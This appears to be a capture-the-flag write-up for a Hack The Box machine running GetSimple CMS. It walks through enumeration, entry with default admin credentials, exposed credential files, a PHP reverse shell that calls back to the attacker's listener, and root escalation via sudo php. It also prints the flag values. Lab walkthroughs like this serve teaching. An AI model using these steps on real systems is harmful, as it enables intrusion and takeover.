HTB: GetSimple CMS

included in HTB CTF

29 Jun 2023 4 minutes

Contents

Easy HTB machine where I exploit a webserver with GetSimple CMS.

Introduction

I will use gobuster to find a hidden login page and use default credentials to get initial access. I get a www-data shell by using a reverse shell, and elevate privilages to root by using the sudo access for /usr/bin/php.

Enumeration

nmap output:

            
                
                        
                            
DuxSec@hi$ nmap -sV -T4 -sC 10.129.217.0 -v 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-29 06:19 EDT
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
|   256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_  256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to GetSimple! - gettingstarted
| http-robots.txt: 1 disallowed entry 
|_/admin/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 06:19
Completed NSE at 06:19, 0.00s elapsed
Initiating NSE at 06:19
Completed NSE at 06:19, 0.00s elapsed
Initiating NSE at 06:19
Completed NSE at 06:19, 0.01s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.82 seconds

                        
                    

            
        

Port 22 and 80 are open. Let’s have a look at the website, and while I am browsing I start a gobuster scan.

Host configuration

I tried to go to http://10.129.217.0 but this took ages to load, so I added the IP to my /etc/hosts/ file. I added the following line:

10.129.217.0	gettingstarted.htb

Because of this change I could now visit http://gettingstarted.htb without delay. I read in the HTB forums later on that multiple people had this issue.

Gobuster results

Well that took some time and the gobuster is already finished, so let’s look at that.

            
                
                        
                            
DuxSec@hi$ gobuster dir -u http://10.129.217.0 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.129.217.0
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/06/29 06:20:22 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 277]
/.hta                 (Status: 403) [Size: 277]
/admin                (Status: 301) [Size: 312] [--> http://10.129.217.0/admin/]
/backups              (Status: 301) [Size: 314] [--> http://10.129.217.0/backups/]
/.htaccess            (Status: 403) [Size: 277]
/data                 (Status: 301) [Size: 311] [--> http://10.129.217.0/data/]
/index.php            (Status: 200) [Size: 5485]
/plugins              (Status: 301) [Size: 314] [--> http://10.129.217.0/plugins/]
/robots.txt           (Status: 200) [Size: 32]
/server-status        (Status: 403) [Size: 277]
/sitemap.xml          (Status: 200) [Size: 431]
/theme                (Status: 301) [Size: 312] [--> http://10.129.217.0/theme/]
Progress: 4444 / 4615 (96.29%)
===============================================================
2023/06/29 06:20:35 Finished
===============================================================

                        
                    

            
        

Initial foothold

Many hits! /admin looks very interesting, it gives shows us the following login page:

I try the credentials admin:admin and I am in the admin panel!

I still checked the other gobuster links to see if there is anything interesting, and found the following that there are open directories, this might be helpful later on. Some examples:

http://gettingstarted.htb/data/other/authorization.xml

1
2
3


<item>
	<apikey>4f399dc72ff8e619e327800f851e9986</apikey>
</item>

http://gettingstarted.htb/data/users/admin.xml

1
2
3
4
5
6
7
8
9


<item>
	<USR>admin</USR>
	<NAME/>
	<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
	<EMAIL>admin@gettingstarted.com</EMAIL>
	<HTMLEDITOR>1</HTMLEDITOR>
	<TIMEZONE/>
	<LANG>en_US</LANG>
</item>

The next step is to get a reverse shell, I chose to use https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php due to its simplicity. I replace the original theme code with the reverse shell.

Now I can open a nc listener. Then I can go to http://gettingstarted.htb , normally it would load the theme file, but since that is my reverse shell now, it executes that instead. It connects back to me and I succesfully get a shell as www-data.

            
DuxSec@hi$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.15.155] from (UNKNOWN) [10.129.162.83] 52066
Linux gettingstarted 5.4.0-65-generic #73-Ubuntu SMP Mon Jan 18 17:25:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 14:28:43 up 30 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

To get a fully interactive shell I use Python3;

            
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@gettingstarted:/$ ^Z
zsh: suspended  nc -lvnp 4444
                                                                                                                      
DuxSec@hi$ stty raw -echo; fg    
[1]  + continued  nc -lvnp 4444

www-data@gettingstarted:/$

User flag

The first flag can be read since www-data has read access to mrb3n’s home directory.

            
www-data@gettingstarted:/home/mrb3n$ cat user.txt 
7002d65b149b0a4d19132a66feed21d8

Root flag

To get the root flag I look for sudo rights, and it shows that www-data can use /usr/bin/php as root without using a password.

            
www-data@gettingstarted:/$ sudo -l                                         
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php

Knowing that php can be ran as sudo, I can spawn a shell as sudo via php in the
following way:

            
www-data@gettingstarted:/$ sudo /usr/bin/php -r 'system("/bin/bash");'
root@gettingstarted:/# whoami
root
root@gettingstarted:/# cd /root   
root@gettingstarted:~# cat root.txt
root@gettingstarted:~# f1fba6e9f71efb2630e6e34da6387842

If I wouldn’t know php, I could use https://gtfobins.github.io/gtfobins/php/ to find a privilege escalation oneliner.